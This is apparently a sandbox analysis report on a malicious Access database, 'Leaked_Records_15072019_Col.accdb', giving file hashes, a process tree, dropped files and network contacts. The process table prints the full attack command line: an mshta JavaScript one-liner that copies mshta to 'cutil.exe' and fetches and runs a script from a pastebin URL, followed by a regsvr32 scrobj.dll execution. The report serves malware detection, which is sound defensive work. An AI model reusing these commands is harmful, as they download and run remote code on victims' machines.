Field | Value |
---|---|
File name | Leaked_Records_15072019_Col.accdb |
Full analysis | https://app.any.run/tasks/0cf1b497-8ce2-4b5a-9656-6faab4a4f48e |
Verdict | Malicious activity |
Analysis date | July 17, 2019, 13:56:13 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators | |
MIME | application/x-msaccess |
File info | Microsoft Access Database |
MD5 | BEFC603B7E59E0B739AE150FFC0CAD3A |
SHA1 | 4BF499C320E6806E877E68876A3BEB2ADA2A45AC |
SHA256 | 7C02D2F27147C49030C0619D1D313CFA24234F789E149B2E3D1478400496A32C |
SSDEEP | 1536:DAQxNqc6lh3WHzVdGduAixBQdpdzdmdudJ:DAQxNqc6lsfkuAixAjJEcJ |

Extension | Description |
---|---|
.accdb | Microsoft Access 2007 Database (90.4) |
.pi2 | DEGAS med-res bitmap (9.5) |

PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
3704 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\Desktop\Leaked_Records_15072019_Col.accdb | C:\Windows\system32\rundll32.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows host process (Rundll32); Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
2296 | "C:\Program Files\Microsoft Office\Office14\MSACCESS.EXE" /NOSTARTUP "C:\Users\admin\Desktop\Leaked_Records_15072019_Col.accdb" | C:\Program Files\Microsoft Office\Office14\MSACCESS.EXE | | rundll32.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Access; Exit code: 0; Version: 14.0.6024.1000 |
3620 | "C:\Windows\System32\mshta.exe" javascript:eval(new%20ActiveXObject("Scripting.FileSystemObject").CopyFile%20("c:\\windows\\system32\\mshta.exe",%20new%20ActiveXObject("Wscript.Shell").ExpandEnvironmentStrings("%25userprofile%25")+"\\AppData\\Local\\Microsoft\\cutil.exe"));eval(new%20ActiveXObject("Wscript.Shell").Run(new%20ActiveXObject("Wscript.Shell").ExpandEnvironmentStrings("%25userprofile%25")+"\\AppData\\Local\\Microsoft\\cutil%20javascript:eval(a=GetObject('script:https://pastebin.com/raw/viwSRB6M'));close();"));close(); | C:\Windows\System32\mshta.exe | | MSACCESS.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft (R) HTML Application host; Exit code: 0; Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
2064 | "C:\Users\admin\AppData\Local\Microsoft\cutil.exe" javascript:eval(a=GetObject('script:https://pastebin.com/raw/viwSRB6M'));close(); | C:\Users\admin\AppData\Local\Microsoft\cutil.exe | | mshta.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft (R) HTML Application host; Exit code: 0; Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
3588 | "C:\Windows\System32\regsvr32.exe" /u /n /s /i:C:\Users\admin\AppData\Local\logs.tmp scrobj.dll | C:\Windows\System32\regsvr32.exe | — | cutil.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft(C) Register Server; Exit code: 5; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |


PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2296 | MSACCESS.EXE | C:\Users\admin\AppData\Local\Temp\CVRF6D.tmp.cvr | — | — | — |
2296 | MSACCESS.EXE | C:\Users\admin\AppData\Local\Temp\~DF1D1212693DF4D212.TMP | — | — | — |
2296 | MSACCESS.EXE | C:\Users\admin\Desktop\Leaked_Records_15072019_Col.laccdb | — | — | — |
2296 | MSACCESS.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Access\System.ldb | — | — | — |
2296 | MSACCESS.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Leaked_Records_15072019_Col.accdb.LNK | lnk | 77923180D16AEB9F018769FAE5E86513 | CD2752DEA7C9DDCCC358B7CDB2AA0ED68E8A4CF607E16D1D483028926F3E8EB4 |
2296 | MSACCESS.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Access\System.mdw | mdw | 7304E00D382D4624140D92952F8BB219 | D65513DB2DFAB8495CFBF35A24D89CB5A8274B7519DB5C9AB6FA5FAE565E8E56 |
2064 | cutil.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\viwSRB6M[1].txt | xml | 3739532BDF9B523E245EEEDD062AB5FF | 544C113236191E588D7679CB9168C5D45A8D4736B5D08217BE1C66DED4F468F3 |
2064 | cutil.exe | C:\Users\admin\AppData\Local\temp.tmp | executable | 91456160503D1965136BBE939606878E | 350CDEC0802FB24B9AA93CF44C318DCC12BBAF2D85B0E43D0142C54690A18138 |
2296 | MSACCESS.EXE | C:\Users\admin\AppData\Local\Temp\Database.lnk | lnk | 31AEFA424BD036B40F8B9B64C1C9F78F | 67106A3278F63805F941D515BE4A40EA1DB3F0D926A4C9A8C71376F10E5EED26 |
2064 | cutil.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txt | text | C939488752FEF70DDE2977B4E5F4D58F | 3D9EA4BAF4FF97B12C959D2D81776DC96F1E181F5878008BEA28E3D4C9F49656 |

PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2064 | cutil.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |

Domain | IP | Reputation |
---|---|---|
pastebin.com | | shared |

Process | Message |
---|---|
MSACCESS.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Access\System.mdw |